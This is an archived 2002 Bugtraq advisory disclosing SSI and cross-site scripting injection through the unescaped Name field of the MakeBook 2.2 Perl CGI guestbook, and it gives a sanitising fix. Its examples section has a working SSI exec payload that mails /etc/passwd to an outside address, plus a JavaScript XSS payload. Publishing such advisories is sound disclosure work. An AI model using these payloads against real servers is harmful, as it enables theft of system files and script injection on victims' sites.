SSI & CSS execution in MakeBook 2.2

From: DownBload (downbload@hotmail.com)
Date: 06/12/02


Date: 12 Jun 2002 07:22:06 -0000
From: DownBload <downbload@hotmail.com>
To: bugtraq@securityfocus.com


('binary' encoding is not supported, stored as-is)

      [ DownBload Security Research Lab Advisory ]
[-------------------------------------------------------------------------]
Advisory name: SSI & CSS execution in MakeBook 2.2
Advisory number: 5
Application: MakeBook 2.2 (CGI script)
Application author: Kristina Pfaff-Harris
Source: http://www.tesol.net/scriptmail.html
Date: 12.6.2002
Impact: remote user can execute shell commands & cross site scripting
Tested on: Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4
Discovered by: DownBload
Mail me @: downbload@hotmail.com

------[ Overview

"...MakeBook v2.2 is a simple program which can be used as a guestbook,
an ongoing writing project where each person adds to an ongoing story,
a comment board, or even a way to let people add comments to many
individual pages. It allows a user to enter their name, email address,
and some text which will then be added to the "bookfile". Originally
intended for use in writing a continuing story or journal, where
different students could add to the story as they went along, it has
evolved into a more flexible system which allows the owner to choose
how the "book" entries should appear, and even what pages they appear
on..."

                                   

------[ Problem
        
Our dear Kristina wrote an advanced CGI guestbook, in perl ofcorse.
It works fine, but troubles comes when you look for security measures in
program. When you want to sign guestbook, you have to write your name,
email address, and some text. Script does remove 'some' special-char in
$text, but script doesn't replace special-chars in $name at all, and
because
of that, it is possible instead of name, enter and execute some SSI(Server
Side Includes) or CSS(Cross Site Scripting) code.
'Buggy' code:
...
$name =$data{"Name"};
$email =$data{"Email"};
$text =$data{"Text"};
$text =~ s/</&lt;/g;
$text =~ s/>/&gt;/g;
...

------[ Examples

SSI attack
~~~~~~~~~~
Name: <!--#exec cmd="/bin/mail downbload@hotmail.com < /etc/passwd"-->
E-mail: downbload@hotmail.com
Text: I hacked you, my kung-fu is the best... ;)

CSS attack
~~~~~~~~~~
Name: <img src="javascript:alert('HACKED BY DOWNBLOAD');">
E-mail: downbload@hotmail.com
Text: I hacked you, my kung-fu is the best... ;)

I won't give you more examples, use your own imagination :).
BTW: SSI attack depends on web server, because some web servers
comes with, and some without support for SSI.

------[ Solution

Solution for this bug would be to filter special characters from user
input. For now, you can use this:

...
$name = $data{"Name"};
$name =~ s/</&lt;/g;
$name =~ s/>/&gt;/g;

$email = $data{"Email"};
$email =~ s/</&lt;/g;
$email =~ s/>/&gt;/g;

$text = $data{"Text"};
$text =~ s/</&lt;/g;
$text =~ s/>/&gt;/g;
...

------[ Greetz

Greetz goes to #hr.hackers <irc.carnet.hr>.
Special greetz goes to Kristina Pfaff-Harris (ladies first), BoyScout,
h4z4rd, fi, Fr1c, harlequin and www.active-security.org.
                



Relevant Pages

  • Re: Logging sftp file transfers
    ... *> just curious why you would need execute on files for ssi? ... *> requirement for ssi to work. ... (except of course, dirs need exec) ... like run a script via cron over the web dir's and look for new ...
    (RedHat)
  • Re: Will Linux become as vulnerable as MS ??
    ... > beeing vulnerable to viruses. ... > that they know are executable, and execute intentionally. ... >> Linux, each distro is a little different, and even within the distro, ... > Since clicking on a script is easier than typing it's name, ...
    (comp.os.linux.security)
  • Re: Small, understandable Forth
    ... intelligence from the word to the script. ... niclos file script files, but only in the directory in which they are ... \ there are required support vocabularies, ... RDROP EXECUTE DEFINITIONS; ...
    (comp.lang.forth)
  • [RT-SA-2014-008] Python CGIHTTPServer File Disclosure and Potential Code Execution
    ... The CGIHTTPServer Python module does not properly handle URL-encoded ... script's source code or execute arbitrary CGI scripts in the server's ... A sample server script in Python may look like the ... This server should execute any scripts located in the subdirectory ...
    (Bugtraq)
  • Re: [Full-Disclosure] ColdFusion cross-site scripting security vulnerability of an error page
    ... > execute the arbitrary javascript and HTML code which the attacker ... > It is possible to display the contents transmitted from the client ... > cross-site scripting attack can be executed. ... the script will be executed when the script for an attack ...
    (Full-Disclosure)